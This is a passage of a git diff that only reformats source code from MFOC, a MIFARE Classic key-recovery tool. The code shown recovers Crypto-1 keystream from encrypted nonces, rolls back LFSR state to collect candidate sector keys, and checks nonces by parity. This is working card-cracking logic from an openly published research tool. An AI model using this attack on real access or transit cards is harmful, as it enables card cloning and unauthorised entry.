Parity validity check - for (i = 0; i < 3; ++i) { - d->parity[i] = (oddparity(Rx[i]) != RxPar[i]); - } + // Parity validity check + for (i = 0; i < 3; ++i) { + d->parity[i] = (oddparity(Rx[i]) != RxPar[i]); + } - // Iterate over Nt-x, Nt+x - // fprintf(stdout, "Iterate from %d to %d\n", d->median-TOLERANCE, d->median+TOLERANCE); - NtProbe = prng_successor(Nt, d->median-d->tolerance); - for (m = d->median-d->tolerance; m <= d->median+d->tolerance; m +=2) { + // Iterate over Nt-x, Nt+x + // fprintf(stdout, "Iterate from %d to %d\n", d->median-TOLERANCE, d->median+TOLERANCE); + NtProbe = prng_successor(Nt, d->median - d->tolerance); + for (m = d->median - d->tolerance; m <= d->median + d->tolerance; m += 2) { - // Try to recover the keystream1 - Ks1 = NtEnc ^ NtProbe; + // Try to recover the keystream1 + Ks1 = NtEnc ^ NtProbe; - // Skip this nonce after invalid 3b parity check - revstate_start = NULL; - if (valid_nonce(NtProbe, NtEnc, Ks1, d->parity)) { - // And finally recover the first 32 bits of the key - revstate = lfsr_recovery32(Ks1, NtProbe ^ t.authuid); - if (revstate_start == NULL) { - revstate_start = revstate; - } - while ((revstate->odd != 0x0) || (revstate->even != 0x0)) { - lfsr_rollback_word(revstate, NtProbe ^ t.authuid, 0); - crypto1_get_lfsr(revstate, &lfsr); - // Allocate a new space for keys - if (((kcount % MEM_CHUNK) == 0) || (kcount >= pk->size)) { - pk->size += MEM_CHUNK; - // fprintf(stdout, "New chunk by %d, sizeof %lu\n", kcount, pk->size * sizeof(uint64_t)); - pk->possibleKeys = (uint64_t *) realloc((void *)pk->possibleKeys, pk->size * sizeof(uint64_t)); - if (pk->possibleKeys == NULL) { - ERR ("Memory allocation error for pk->possibleKeys"); - exit (EXIT_FAILURE); - } - } - pk->possibleKeys[kcount] = lfsr; - kcount++; - revstate++; - } - free(revstate_start); - } - NtProbe = prng_successor(NtProbe, 2); - } - // Truncate - if (kcount != 0) { - pk->size = --kcount; - if ((pk->possibleKeys = (uint64_t *) realloc((void *)pk->possibleKeys, pk->size * sizeof(uint64_t))) == NULL) { - ERR ("Memory allocation error for pk->possibleKeys"); - exit (EXIT_FAILURE); - } - } - } - crypto1_destroy(pcs); - return 0; + // Skip this nonce after invalid 3b parity check + revstate_start = NULL; + if (valid_nonce(NtProbe, NtEnc, Ks1, d->parity)) { + // And finally recover the first 32 bits of the key + revstate = lfsr_recovery32(Ks1, NtProbe ^ t.authuid); + if (revstate_start == NULL) { + revstate_start = revstate; + } + while ((revstate->odd != 0x0) || (revstate->even != 0x0)) { + lfsr_rollback_word(revstate, NtProbe ^ t.authuid, 0); + crypto1_get_lfsr(revstate, &lfsr); + // Allocate a new space for keys + if (((kcount % MEM_CHUNK) == 0) || (kcount >= pk->size)) { + pk->size += MEM_CHUNK; + // fprintf(stdout, "New chunk by %d, sizeof %lu\n", kcount, pk->size * sizeof(uint64_t)); + pk->possibleKeys = (uint64_t *) realloc((void *)pk->possibleKeys, pk->size * sizeof(uint64_t)); + if (pk->possibleKeys == NULL) { + ERR("Memory allocation error for pk->possibleKeys"); + exit(EXIT_FAILURE); + } + } + pk->possibleKeys[kcount] = lfsr; + kcount++; + revstate++; + } + free(revstate_start); + } + NtProbe = prng_successor(NtProbe, 2); + } + // Truncate + if (kcount != 0) { + pk->size = --kcount; + if ((pk->possibleKeys = (uint64_t *) realloc((void *)pk->possibleKeys, pk->size * sizeof(uint64_t))) == NULL) { + ERR("Memory allocation error for pk->possibleKeys"); + exit(EXIT_FAILURE); + } + } + } + crypto1_destroy(pcs); + return 0; } // Return the median value from the nonce distances array -uint32_t median(denonce d) { - int middle = (int) d.num_distances / 2; - qsort(d.distances, d.num_distances, sizeof(uint32_t), compar_int); +uint32_t median(denonce d) +{ + int middle = (int) d.num_distances / 2; + qsort(d.distances, d.num_distances, sizeof(uint32_t), compar_int); - if (d.num_distances % 2 == 1) { - // Odd number of elements - return d.distances[middle]; - } else { - // Even number of elements, return the smaller value - return (uint32_t) (d.distances[middle-1]); - } + if (d.num_distances % 2 == 1) { + // Odd number of elements + return d.distances[middle]; + } else { + // Even number of elements, return the smaller value + return (uint32_t)(d.distances[middle - 1]); + } } -int compar_int(const void * a, const void * b) { - return (*(uint64_t*)b - *(uint64_t*)a); +int compar_int(const void *a, const void *b) +{ + return (*(uint64_t *)b - * (uint64_t *)a); } // Compare countKeys structure -int compar_special_int(const void * a, const void * b) { - return (((countKeys *)b)->count - ((countKeys *)a)->count); +int compar_special_int(const void *a, const void *b) +{ + return (((countKeys *)b)->count - ((countKeys *)a)->count); } -countKeys * uniqsort(uint64_t * possibleKeys, uint32_t size) { - unsigned int i, j = 0; - int count = 0; - countKeys *our_counts; +countKeys *uniqsort(uint64_t *possibleKeys, uint32_t size) +{ + unsigned int i, j = 0; + int count = 0; + countKeys *our_counts; - qsort(possibleKeys, size, sizeof (uint64_t), compar_int); + qsort(possibleKeys, size, sizeof(uint64_t), compar_int); - our_counts = calloc(size, sizeof(countKeys)); - if (our_counts == NULL) { - ERR ("Memory allocation error for our_counts"); - exit (EXIT_FAILURE); - } + our_counts = calloc(size, sizeof(countKeys)); + if (our_counts == NULL) { + ERR("Memory allocation error for our_counts"); + exit(EXIT_FAILURE); + } - for (i = 0; i < size; i++) { - if (possibleKeys[i+1] == possibleKeys[i]) { - count++; - } else { - our_counts[j].key = possibleKeys[i]; - our_counts[j].count = count; - j++; - count=0; - } - } - qsort(our_counts, j, sizeof(countKeys), compar_special_int); - return (our_counts); + for (i = 0; i < size; i++) { + if (possibleKeys[i + 1] == possibleKeys[i]) { + count++; + } else { + our_counts[j].key = possibleKeys[i]; + our_counts[j].count = count; + j++; + count = 0; + } + } + qsort(our_counts, j, sizeof(countKeys), compar_special_int); + return (our_counts); } // Return 1 if the nonce is invalid else return 0 -int valid_nonce(uint32_t Nt, uint32_t NtEnc, uint32_t Ks1, uint8_t * parity) { - return ((odd_parity((Nt >> 24) & 0xFF) == ((parity[0]) ^ odd_parity((NtEnc >> 24) & 0xFF) ^ BIT(Ks1,16))) & \ - (odd_parity((Nt >> 16) & 0xFF) == ((parity[1]) ^ odd_parity((NtEnc >> 16) & 0xFF) ^ BIT(Ks1,8))) & \ - (odd_parity((Nt >> 8) & 0xFF) == ((parity[2]) ^ odd_parity((NtEnc >> 8) & 0xFF) ^ BIT(Ks1,0)))) ? 1 : 0; +int valid_nonce(uint32_t Nt, uint32_t NtEnc, uint32_t Ks1, uint8_t *parity) +{ + return ((odd_parity((Nt >> 24) & 0xFF) == ((parity[0]) ^ odd_parity((NtEnc >> 24) & 0xFF) ^ BIT(Ks1, 16))) & \ + (odd_parity((Nt >> 16) & 0xFF) == ((parity[1]) ^ odd_parity((NtEnc >> 16) & 0xFF) ^ BIT(Ks1, 8))) & \ + (odd_parity((Nt >> 8) & 0xFF) == ((parity[2]) ^ odd_parity((NtEnc >> 8) & 0xFF) ^ BIT(Ks1, 0)))) ? 1 : 0; } -void num_to_bytes(uint64_t n, uint32_t len, uint8_t* dest) { - while (len--) { - dest[len] = (uint8_t) n; - n >>= 8; - } +void num_to_bytes(uint64_t n, uint32_t len, uint8_t *dest) +{ + while (len--) { + dest[len] = (uint8_t) n; + n >>= 8; + } } -long long unsigned int bytes_to_num(uint8_t* src, uint32_t len) { - uint64_t num = 0; - while (len--) - { - num = (num << 8) | (*src); - src++; - } - return num; +long long unsigned int bytes_to_num(uint8_t *src, uint32_t len) +{ + uint64_t num = 0; + while (len--) { + num = (num << 8) | (*src); + src++; + } + return num; } diff --git a/src/mfoc.h b/src/mfoc.h index b0696e1..db16c0f 100644 --- a/src/mfoc.h +++ b/src/mfoc.h @@ -24,63 +24,63 @@ #define odd_parity(i) (( (i) ^ (i)>>1 ^ (i)>>2 ^ (i)>>3 ^ (i)>>4 ^ (i)>>5 ^ (i)>>6 ^ (i)>>7 ^ 1) & 0x01) typedef struct { - uint8_t KeyA[6]; - uint8_t KeyB[6]; - bool foundKeyA; - bool foundKeyB; - uint8_t trailer; // Value of a trailer block + uint8_t KeyA[6]; + uint8_t KeyB[6]; + bool foundKeyA; + bool foundKeyB; + uint8_t trailer; // Value of a trailer block } sector; typedef struct { - uint32_t *distances; - uint32_t median; - uint32_t num_distances; - uint32_t tolerance; - uint8_t parity[3]; // used for 3 bits of parity information + uint32_t *distances; + uint32_t median; + uint32_t num_distances; + uint32_t tolerance; + uint8_t parity[3]; // used for 3 bits of parity information } denonce; // Revealed information about nonce typedef struct { - nfc_target nt; - sector * sectors; // Allocate later, we do not know the number of sectors yet - sector e_sector; // Exploit sector - uint8_t num_sectors; - uint8_t num_blocks; - uint32_t authuid; - bool b4K; + nfc_target nt; + sector *sectors; // Allocate later, we do not know the number of sectors yet + sector e_sector; // Exploit sector + uint8_t num_sectors; + uint8_t num_blocks; + uint32_t authuid; + bool b4K; } mftag; typedef struct { - uint64_t *possibleKeys; - uint32_t size; + uint64_t *possibleKeys; + uint32_t size; } pKeys; typedef struct { - uint64_t *brokenKeys; - int32_t size; + uint64_t *brokenKeys; + int32_t size; } bKeys; typedef struct { - nfc_device *pdi; + nfc_device *pdi; } mfreader; typedef struct { - uint64_t key; - int count; + uint64_t key; + int count; } countKeys; -void usage(FILE * stream, int errno); +void usage(FILE *stream, int errno); void mf_init(mfreader *r); -void mf_configure(nfc_device* pdi); -void mf_select_tag(nfc_device* pdi, nfc_target* pnt); +void mf_configure(nfc_device *pdi); +void mf_select_tag(nfc_device *pdi, nfc_target *pnt); int trailer_block(uint32_t block); int find_exploit_sector(mftag t); void mf_anticollision(mftag t, mfreader r); int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d, pKeys *pk, char mode, bool dumpKeysA); uint32_t median(denonce d); -int compar_int(const void * a, const void * b); -int valid_nonce(uint32_t Nt, uint32_t NtEnc, uint32_t Ks1, uint8_t * parity); -int compar_special_int(const void * a, const void * b); -countKeys * uniqsort(uint64_t *possibleKeys, uint32_t size); -void num_to_bytes(uint64_t n, uint32_t len, uint8_t* dest); -long long unsigned int bytes_to_num(uint8_t* src, uint32_t len); +int compar_int(const void *a, const void *b); +int valid_nonce(uint32_t Nt, uint32_t NtEnc, uint32_t Ks1, uint8_t *parity); +int compar_special_int(const void *a, const void *b); +countKeys *uniqsort(uint64_t *possibleKeys, uint32_t size); +void num_to_bytes(uint64_t n, uint32_t len, uint8_t *dest); +long long unsigned int bytes_to_num(uint8_t *src, uint32_t len);